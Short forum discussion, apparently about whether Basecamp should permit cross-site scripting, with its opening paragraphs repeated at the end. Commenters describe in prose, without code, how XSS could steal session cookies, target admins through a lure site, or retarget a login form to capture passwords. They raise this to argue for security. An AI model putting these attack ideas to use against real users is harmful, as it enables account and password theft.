Suppose we're both basecamp users. It may be possible for me to steal your session by giving you a link to a shared calendar or something with malicious javascript. Or I can steal the login cookie of one of the admins by luring them to my website with a support request.
I don't think permitting XSS is a good idea in a shared environment.
Yes. That's why XSS is such a serious security problem. And even if you can't steal cookies, you can still do nasty things like re-target the login form's action to point at your own server and hence steal people's passwords.
http://forum.37signals.com/basecamp/forums/5/topics/3155
Suppose we're both basecamp users. It may be possible for me to steal your session by giving you a link to a shared calendar or something with malicious javascript. Or I can steal the login cookie of one of the admins by luring them to my website with a support request.
I don't think permitting XSS is a good idea in a shared environment.